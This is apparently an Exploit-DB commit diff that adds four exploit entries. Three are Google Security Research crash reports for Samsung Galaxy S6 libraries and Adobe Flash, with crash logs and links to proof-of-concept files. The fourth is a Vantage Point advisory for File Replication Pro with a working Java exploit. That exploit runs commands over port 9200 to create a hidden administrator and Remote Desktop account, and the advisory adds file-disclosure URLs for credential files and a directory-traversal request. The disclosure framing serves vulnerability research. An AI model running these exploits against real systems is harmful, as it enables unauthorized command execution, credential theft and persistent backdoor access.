DB: 2016-02-12
4 new exploits
This commit is contained in:
parent
3b34885ebf
commit
c25db93691
5 changed files with 297 additions and 0 deletions
|
@ -35662,6 +35662,9 @@ id,file,description,date,author,platform,type,port
|
||||||
39421,platforms/php/webapps/39421.py,"WordPress WooCommerce Store Toolkit Plugin 1.5.5 - Privilege Escalation",2016-02-08,"Panagiotis Vagenas",php,webapps,80
|
39421,platforms/php/webapps/39421.py,"WordPress WooCommerce Store Toolkit Plugin 1.5.5 - Privilege Escalation",2016-02-08,"Panagiotis Vagenas",php,webapps,80
|
||||||
39422,platforms/php/webapps/39422.py,"WordPress WP User Frontend Plugin < 2.3.11 - Unrestricted File Upload",2016-02-08,"Panagiotis Vagenas",php,webapps,80
|
39422,platforms/php/webapps/39422.py,"WordPress WP User Frontend Plugin < 2.3.11 - Unrestricted File Upload",2016-02-08,"Panagiotis Vagenas",php,webapps,80
|
||||||
39423,platforms/php/webapps/39423.txt,"WordPress Booking Calendar Contact Form Plugin <= 1.0.23 - Multiple Vulnerabilities",2016-02-08,"i0akiN SEC-LABORATORY",php,webapps,80
|
39423,platforms/php/webapps/39423.txt,"WordPress Booking Calendar Contact Form Plugin <= 1.0.23 - Multiple Vulnerabilities",2016-02-08,"i0akiN SEC-LABORATORY",php,webapps,80
|
||||||
|
39424,platforms/android/dos/39424.txt,"Samsung Galaxy S6 - libQjpeg je_free Crash",2016-02-08,"Google Security Research",android,dos,0
|
||||||
|
39425,platforms/android/dos/39425.txt,"Samsung Galaxy S6 - android.media.process Face Recognition Memory Corruption (MdConvertLine)",2016-02-08,"Google Security Research",android,dos,0
|
||||||
|
39426,platforms/multiple/dos/39426.txt,"Adobe Flash - Processing AVC Causes Stack Corruption",2016-02-08,"Google Security Research",multiple,dos,0
|
||||||
39427,platforms/php/webapps/39427.txt,"Employee Timeclock Software 0.99 - SQL Injection Vulnerabilities",2010-03-10,"Secunia Research",php,webapps,0
|
39427,platforms/php/webapps/39427.txt,"Employee Timeclock Software 0.99 - SQL Injection Vulnerabilities",2010-03-10,"Secunia Research",php,webapps,0
|
||||||
39428,platforms/windows/dos/39428.txt,"PotPlayer 1.6.5x - .mp3 Crash PoC",2016-02-09,"Shantanu Khandelwal",windows,dos,0
|
39428,platforms/windows/dos/39428.txt,"PotPlayer 1.6.5x - .mp3 Crash PoC",2016-02-09,"Shantanu Khandelwal",windows,dos,0
|
||||||
39429,platforms/windows/dos/39429.txt,"Adobe Photoshop CC & Bridge CC PNG File Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0
|
39429,platforms/windows/dos/39429.txt,"Adobe Photoshop CC & Bridge CC PNG File Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0
|
||||||
|
@ -35673,3 +35676,4 @@ id,file,description,date,author,platform,type,port
|
||||||
39436,platforms/php/webapps/39436.txt,"Yeager CMS 1.2.1 - Multiple Vulnerabilities",2016-02-10,"SEC Consult",php,webapps,80
|
39436,platforms/php/webapps/39436.txt,"Yeager CMS 1.2.1 - Multiple Vulnerabilities",2016-02-10,"SEC Consult",php,webapps,80
|
||||||
39437,platforms/hardware/remote/39437.rb,"D-Link DCS-930L Authenticated Remote Command Execution",2016-02-10,metasploit,hardware,remote,0
|
39437,platforms/hardware/remote/39437.rb,"D-Link DCS-930L Authenticated Remote Command Execution",2016-02-10,metasploit,hardware,remote,0
|
||||||
39438,platforms/xml/local/39438.txt,"Wieland wieplan 4.1 Document Parsing Java Code Execution Using XMLDecoder",2016-02-10,LiquidWorm,xml,local,0
|
39438,platforms/xml/local/39438.txt,"Wieland wieplan 4.1 Document Parsing Java Code Execution Using XMLDecoder",2016-02-10,LiquidWorm,xml,local,0
|
||||||
|
39439,platforms/jsp/remote/39439.txt,"File Replication Pro <= 7.2.0 - Multiple Vulnerabilities",2016-02-11,"Vantage Point Security",jsp,remote,0
|
||||||
|
|
Can't render this file because it is too large.
|
41
platforms/android/dos/39424.txt
Executable file
41
platforms/android/dos/39424.txt
Executable file
|
@ -0,0 +1,41 @@
|
||||||
|
Source: https://code.google.com/p/google-security-research/issues/detail?id=617
|
||||||
|
|
||||||
|
The attached jpg causes an invalid pointer to be freed when media scanning occurs.
|
||||||
|
|
||||||
|
F/libc (11192): Fatal signal 11 (SIGSEGV), code 1, fault addr 0xffffffffffffb0 in tid 14368 (HEAVY#7)
|
||||||
|
I/DEBUG ( 3021): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
|
||||||
|
I/DEBUG ( 3021): Build fingerprint: 'Verizon/zeroltevzw/zeroltevzw:5.1.1/LMY47X/G925VVRU4BOG9:user/release-keys'
|
||||||
|
I/DEBUG ( 3021): Revision: '10'
|
||||||
|
I/DEBUG ( 3021): ABI: 'arm64'
|
||||||
|
I/DEBUG ( 3021): pid: 11192, tid: 14368, name: HEAVY#7 >>> com.samsung.dcm:DCMService <<<
|
||||||
|
I/DEBUG ( 3021): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xffffffffffffb0
|
||||||
|
I/DEBUG ( 3021): x0 0000000000000002 x1 0000007f89fa9758 x2 00000000003fffff x3 0000000000000000
|
||||||
|
I/DEBUG ( 3021): x4 0000000000000000 x5 0000007f89f98000 x6 0000007f89fa9790 x7 0000000000000006
|
||||||
|
I/DEBUG ( 3021): x8 fffffffffffffffa x9 ffffffffffffffee x10 ffffffffffffff70 x11 0000007f7f000bb8
|
||||||
|
I/DEBUG ( 3021): x12 0000000000000014 x13 0000007f89f98000 x14 0000007f89fa5000 x15 0000004000000000
|
||||||
|
I/DEBUG ( 3021): x16 0000007f7eed6ba0 x17 0000007f89ef38fc x18 0000007f89fa9830 x19 0000000000000002
|
||||||
|
I/DEBUG ( 3021): x20 000000000000001f x21 0000007f89f98000 x22 00000000ffffffff x23 0000007f7f0647f8
|
||||||
|
I/DEBUG ( 3021): x24 0000007f71809b10 x25 0000000000000010 x26 0000000000000080 x27 fffffffffffffffc
|
||||||
|
I/DEBUG ( 3021): x28 0000007f7edf9dd0 x29 0000007f7edf9b50 x30 0000007f89ef3914
|
||||||
|
I/DEBUG ( 3021): sp 0000007f7edf9b50 pc 0000007f89f53b24 pstate 0000000020000000
|
||||||
|
I/DEBUG ( 3021):
|
||||||
|
I/DEBUG ( 3021): backtrace:
|
||||||
|
I/DEBUG ( 3021): #00 pc 0000000000079b24 /system/lib64/libc.so (je_free+92)
|
||||||
|
I/DEBUG ( 3021): #01 pc 0000000000019910 /system/lib64/libc.so (free+20)
|
||||||
|
I/DEBUG ( 3021): #02 pc 000000000003f8cc /system/lib64/libQjpeg.so (WINKJ_DeleteDecoderInfo+916)
|
||||||
|
I/DEBUG ( 3021): #03 pc 0000000000043890 /system/lib64/libQjpeg.so (WINKJ_DecodeImage+2852)
|
||||||
|
I/DEBUG ( 3021): #04 pc 00000000000439b4 /system/lib64/libQjpeg.so (WINKJ_DecodeFrame+88)
|
||||||
|
I/DEBUG ( 3021): #05 pc 0000000000043af0 /system/lib64/libQjpeg.so (QURAMWINK_DecodeJPEG+284)
|
||||||
|
I/DEBUG ( 3021): #06 pc 0000000000045ddc /system/lib64/libQjpeg.so (QURAMWINK_PDecodeJPEG+440)
|
||||||
|
I/DEBUG ( 3021): #07 pc 00000000000a24c0 /system/lib64/libQjpeg.so (QjpgDecodeFileOpt+432)
|
||||||
|
I/DEBUG ( 3021): #08 pc 0000000000001b98 /system/lib64/libsaiv_codec.so (saiv_codec_JpegCodec_decode_f2bRotate+40)
|
||||||
|
I/DEBUG ( 3021): #09 pc 0000000000001418 /system/lib64/libsaiv_codec.so (Java_com_samsung_android_saiv_codec_JpegCodec_decodeF2BRotate+268)
|
||||||
|
|
||||||
|
To reproduce, download the image file and wait, or trigger media scanning by calling:
|
||||||
|
|
||||||
|
adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/shell/emulated/0/
|
||||||
|
|
||||||
|
|
||||||
|
Proof of Concept:
|
||||||
|
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39424.zip
|
||||||
|
|
32
platforms/android/dos/39425.txt
Executable file
32
platforms/android/dos/39425.txt
Executable file
|
@ -0,0 +1,32 @@
|
||||||
|
Source: https://code.google.com/p/google-security-research/issues/detail?id=616
|
||||||
|
|
||||||
|
The attached file causes memory corruption when iy is scanned by the face recognition library in android.media.process
|
||||||
|
|
||||||
|
F/libc ( 4134): Fatal signal 11 (SIGSEGV), code 1, fault addr 0x33333333333358 in tid 12161 (syncThread)
|
||||||
|
I/DEBUG ( 3021): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
|
||||||
|
I/DEBUG ( 3021): Build fingerprint: 'Verizon/zeroltevzw/zeroltevzw:5.1.1/LMY47X/G925VVRU4BOG9:user/release-keys'
|
||||||
|
I/DEBUG ( 3021): Revision: '10'
|
||||||
|
I/DEBUG ( 3021): ABI: 'arm64'
|
||||||
|
I/DEBUG ( 3021): pid: 4134, tid: 12161, name: syncThread >>> android.process.media <<<
|
||||||
|
I/DEBUG ( 3021): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x33333333333358
|
||||||
|
I/DEBUG ( 3021): x0 3333333333333330 x1 0000007f714b6800 x2 000000000000001f x3 3333333333333330
|
||||||
|
I/DEBUG ( 3021): x4 0000007f817fedb8 x5 0000007f7c1f4ea8 x6 0000007f7c1f4ec0 x7 0000007f7c109680
|
||||||
|
I/DEBUG ( 3021): x8 304b333333333333 x9 3033330333000000 x10 3333333333333333 x11 0103304b33333333
|
||||||
|
I/DEBUG ( 3021): x12 0000040033300311 x13 0300035033333333 x14 0300303333233333 x15 0000000000001484
|
||||||
|
I/DEBUG ( 3021): x16 0000007f74bfe828 x17 0000007f8c086008 x18 0000007f8c13b830 x19 0000007f7c279a00
|
||||||
|
I/DEBUG ( 3021): x20 0000000000000000 x21 0000007f7c1036a0 x22 0000007f817ff440 x23 0000007f7c279a10
|
||||||
|
I/DEBUG ( 3021): x24 0000000032d231a0 x25 0000000000000065 x26 0000000032d28880 x27 0000000000000065
|
||||||
|
I/DEBUG ( 3021): x28 0000000000000000 x29 0000007f817fecb0 x30 0000007f740be014
|
||||||
|
I/DEBUG ( 3021): sp 0000007f817fecb0 pc 0000007f740cefdc pstate 0000000080000000
|
||||||
|
I/DEBUG ( 3021):
|
||||||
|
I/DEBUG ( 3021): backtrace:
|
||||||
|
I/DEBUG ( 3021): #00 pc 0000000000065fdc /system/lib64/libfacerecognition.so (MdConvertLine+28)
|
||||||
|
I/DEBUG ( 3021): #01 pc 0000000000055010 /system/lib64/libfacerecognition.so (MCC_Process+160)
|
||||||
|
|
||||||
|
To reproduce, download the attached file and wait, or trigger media scanning by calling:
|
||||||
|
|
||||||
|
adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/shell/emulated/0/
|
||||||
|
|
||||||
|
|
||||||
|
Proof of Concept:
|
||||||
|
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39425.zip
|
213
platforms/jsp/remote/39439.txt
Executable file
213
platforms/jsp/remote/39439.txt
Executable file
|
@ -0,0 +1,213 @@
|
||||||
|
Vantage Point Security Advisory 2016-001
|
||||||
|
================================
|
||||||
|
|
||||||
|
Title: File Replication Pro Remote Command Execution
|
||||||
|
Vendor: File Replication Pro
|
||||||
|
Vendor URL: http://www.filereplicationpro.com/
|
||||||
|
Versions affected: =< 7.2.0
|
||||||
|
Severity: High
|
||||||
|
Vendor notified: Yes
|
||||||
|
Reported: 29 October 2015
|
||||||
|
Public release: 10 February 2016
|
||||||
|
Author: Jerold Hoong and the VP team <jerold[at]vantagepoint[dot]sg>
|
||||||
|
Permalink:
|
||||||
|
|
||||||
|
Summary:
|
||||||
|
--------
|
||||||
|
File Replication Pro (FRP) is a file management solution that is used
|
||||||
|
to back up and copy files from various nodes in the network. Vantage
|
||||||
|
Point has discovered multiple vulnerabilities in FRP v7.2.0 (and
|
||||||
|
possibly prior versions) that allow a remote unauthenticated malicious
|
||||||
|
run arbitrary code with SYSTEM privileges.
|
||||||
|
|
||||||
|
The vulnerabilities that were discovered are:
|
||||||
|
|
||||||
|
- Unauthenticated Remote Command Execution
|
||||||
|
- Unauthenticated Remote Arbitrary File Disclosure
|
||||||
|
- Unauthenticated Directory Traversal and File Listing
|
||||||
|
|
||||||
|
1. Unauthenticated Remote Command Execution
|
||||||
|
-------------------------------------------
|
||||||
|
The backup agents implements a RPC service port 9200 that supports
|
||||||
|
various calls, including a function called "ExecCommand" that
|
||||||
|
unsurprisingly executes shell commands on the system. A password hash
|
||||||
|
is used to authenticate calls on this interface (note that the hash
|
||||||
|
itself and not the password is used for authentication). This hash can
|
||||||
|
be obtained from the remote file disclosure vulnerability present in
|
||||||
|
the software (listed below) and used to authenticate to the RPC
|
||||||
|
service, where subsequently, arbitrary commands are executed as the
|
||||||
|
SYSTEM user.
|
||||||
|
|
||||||
|
POC Exploit Code of Malicious RPC Client:
|
||||||
|
|
||||||
|
/**
|
||||||
|
* @author Jerold Hoong (Vantage Point Security)
|
||||||
|
* File Replication Pro =< v7.2.0
|
||||||
|
* Remote Command Execution PoC Working Exploit
|
||||||
|
* www.vantagepoint.sg
|
||||||
|
* NOTE: Include FRP libraries to compile
|
||||||
|
*/
|
||||||
|
|
||||||
|
import java.io.IOException;
|
||||||
|
import java.util.HashMap;
|
||||||
|
import java.util.Map;
|
||||||
|
import net.diasoft.frp.engine.exception.RPCException;
|
||||||
|
import net.diasoft.frp.engine.model.AddressPort;
|
||||||
|
import net.diasoft.frp.engine.tcp.client.RPCDriver;
|
||||||
|
import net.diasoft.frp.engine.tcp.client.TCPConnection;
|
||||||
|
|
||||||
|
public class Main {
|
||||||
|
|
||||||
|
static String ip = "1.2.3.4";
|
||||||
|
static int port = 9200;
|
||||||
|
// password string can be retrieved from remote file disclosure
|
||||||
|
vulnerability (configuration.xml)
|
||||||
|
// If no password is set, input blank string for password
|
||||||
|
// Use IE to navigate to <Target IP>:9200. OK = NO-AUTH, Error = AUTH
|
||||||
|
|
||||||
|
static String password = ""; // password 12345 jLIjfQZ5yojbZGTqxg2pY0VROWQ=
|
||||||
|
|
||||||
|
public static void main(String[] args) {
|
||||||
|
|
||||||
|
AddressPort ap = new AddressPort(ip, port);
|
||||||
|
AddressPort addresses[] = {ap};
|
||||||
|
TCPConnection _tcp_connection = null;
|
||||||
|
|
||||||
|
try {
|
||||||
|
_tcp_connection = new TCPConnection(addresses, password, true);
|
||||||
|
|
||||||
|
} catch (Exception e) {
|
||||||
|
e.printStackTrace();
|
||||||
|
}
|
||||||
|
|
||||||
|
System.out.print("Connecting to host...");
|
||||||
|
RPCDriver rpc = new RPCDriver(_tcp_connection);
|
||||||
|
HashMap p = new HashMap();
|
||||||
|
|
||||||
|
try {
|
||||||
|
Map r = rpc.callFunction("ExecCommand", p);
|
||||||
|
System.out.print("Success!\n");
|
||||||
|
} catch (RPCException e) {
|
||||||
|
e.printStackTrace();
|
||||||
|
} catch (IOException e) {
|
||||||
|
e.printStackTrace();
|
||||||
|
} catch (ClassNotFoundException e) {
|
||||||
|
|
||||||
|
e.printStackTrace();
|
||||||
|
}
|
||||||
|
|
||||||
|
// add new user
|
||||||
|
System.out.print("Attempting to add user 'vantagepoint' with
|
||||||
|
password 'LOLrofl1337!': ");
|
||||||
|
p.put("COMMAND", "net user vantagepoint LOLrofl1337! /add");
|
||||||
|
try {
|
||||||
|
Map r = rpc.callFunction("ExecCommand", p);
|
||||||
|
} catch (RPCException e) {
|
||||||
|
e.printStackTrace();
|
||||||
|
} catch (IOException e) {
|
||||||
|
e.printStackTrace();
|
||||||
|
} catch (ClassNotFoundException e) {
|
||||||
|
|
||||||
|
e.printStackTrace();
|
||||||
|
}
|
||||||
|
|
||||||
|
// add new user to Admin group
|
||||||
|
System.out.print("Attempting to add user 'vantagepoint' to
|
||||||
|
'Administrators' group: ");
|
||||||
|
p.put("COMMAND", "net localgroup \"Administrators\" vantagepoint /add");
|
||||||
|
try {
|
||||||
|
Map r = rpc.callFunction("ExecCommand", p);
|
||||||
|
} catch (RPCException e) {
|
||||||
|
e.printStackTrace();
|
||||||
|
} catch (IOException e) {
|
||||||
|
e.printStackTrace();
|
||||||
|
} catch (ClassNotFoundException e) {
|
||||||
|
|
||||||
|
e.printStackTrace();
|
||||||
|
}
|
||||||
|
|
||||||
|
//add new user to RDP group
|
||||||
|
System.out.print("Attempting to add user 'vantagepoint' to
|
||||||
|
'Remote Desktop Users' group:");
|
||||||
|
p.put("COMMAND", "net localgroup \"Remote Desktop Users\"
|
||||||
|
vantagepoint /add");
|
||||||
|
try {
|
||||||
|
Map r = rpc.callFunction("ExecCommand", p);
|
||||||
|
} catch (RPCException e) {
|
||||||
|
e.printStackTrace();
|
||||||
|
} catch (IOException e) {
|
||||||
|
e.printStackTrace();
|
||||||
|
} catch (ClassNotFoundException e) {
|
||||||
|
|
||||||
|
e.printStackTrace();
|
||||||
|
}
|
||||||
|
System.out.print("\n\n---- END ----\n\n");
|
||||||
|
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
2. Unauthenticated Remote Arbitrary File Disclosure
|
||||||
|
---------------------------------------------------
|
||||||
|
A flaw in File Replication Pro allows a malicious user to gain access
|
||||||
|
to the contents of any file on the remote server. This leads to the
|
||||||
|
compromise of sensitive information such as user accounts and password
|
||||||
|
hashes, which can then be used to further exploit the server using
|
||||||
|
other vulnerabilities in the software. An example of how to view File
|
||||||
|
Replication Pro's web interface user accounts and credentials is shown
|
||||||
|
below by accessing the following URLs:
|
||||||
|
|
||||||
|
- http://1.2.3.4:9100/DetailedLogReader.jsp?log_path=C:\Program+Files\FileReplicationPro\\etc\\properties.xml
|
||||||
|
- http://1.2.3.4:9100/DetailedLogReader.jsp?log_path=C:\Program+Files\FileReplicationPro\\etc\\configuration.xml
|
||||||
|
|
||||||
|
|
||||||
|
3. Unauthenticated Directory Traversal and File Listing
|
||||||
|
-------------------------------------------------------
|
||||||
|
It was possible to anonymously view the file directory structure of
|
||||||
|
the remote File Replication Pro management server as well as the file
|
||||||
|
directory structure of all server nodes that are managed by the
|
||||||
|
management server. The parameters that are used to construct the POST
|
||||||
|
request in the example code below can be obtained via the remote file
|
||||||
|
disclosure vulnerability by accessing File Replication Pro's
|
||||||
|
configuration.xml, properties.xml and .frp_id files.
|
||||||
|
|
||||||
|
POST /GetRemoteDirList.jsp?server_name=WIN7SP1&server_key=WIN7SP1~29d919a3:150c736b708:-8000&server_role=Source&server_password=&parent_dir=../../../c:/
|
||||||
|
HTTP/1.1
|
||||||
|
Host: 127.0.0.1:9100
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Referer: http://127.0.0.1:9100/AddEditJob.do?action=new
|
||||||
|
Cookie: show_greeting=value; JSESSIONID=81cgjqf795cai
|
||||||
|
Connection: keep-alive
|
||||||
|
Pragma: no-cache
|
||||||
|
Cache-Control: no-cache
|
||||||
|
Content-Length: 0
|
||||||
|
|
||||||
|
|
||||||
|
Fix Information:
|
||||||
|
----------------
|
||||||
|
Upgrade to the latest version of File Replication Pro 7.3.0
|
||||||
|
|
||||||
|
Timeline:
|
||||||
|
---------
|
||||||
|
28 October 2015 - Vulnerabilities discovered
|
||||||
|
06 November 2015 - Vendor acknowledged and scheduled fixes to commence
|
||||||
|
02 February 2016 - Patch released by vendor
|
||||||
|
10 February 2016 - Release of this advisory to the public
|
||||||
|
|
||||||
|
About Vantage Point Security:
|
||||||
|
-----------------------------
|
||||||
|
|
||||||
|
Vantage Point is the leading provider for penetration testing and
|
||||||
|
security advisory services in Singapore. Clients in the Financial,
|
||||||
|
Banking and Telecommunications industries select Vantage Point
|
||||||
|
Security based on technical competency and a proven track record to
|
||||||
|
deliver significant and measurable improvements in their security
|
||||||
|
posture.
|
||||||
|
|
||||||
|
https://www.vantagepoint.sg/
|
||||||
|
office[at]vantagepoint[dot]sg
|
||||||
|
|
||||||
|
|
7
platforms/multiple/dos/39426.txt
Executable file
7
platforms/multiple/dos/39426.txt
Executable file
|
@ -0,0 +1,7 @@
|
||||||
|
Source: https://code.google.com/p/google-security-research/issues/detail?id=634
|
||||||
|
|
||||||
|
The attached mp4 file causes stack corruption in Flash. To run the test, load LoadMP42.swf?file=null.mp4 from a remote server.
|
||||||
|
|
||||||
|
|
||||||
|
Proof of Concept:
|
||||||
|
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39426-1.zip
|
Loading…
Add table
Reference in a new issue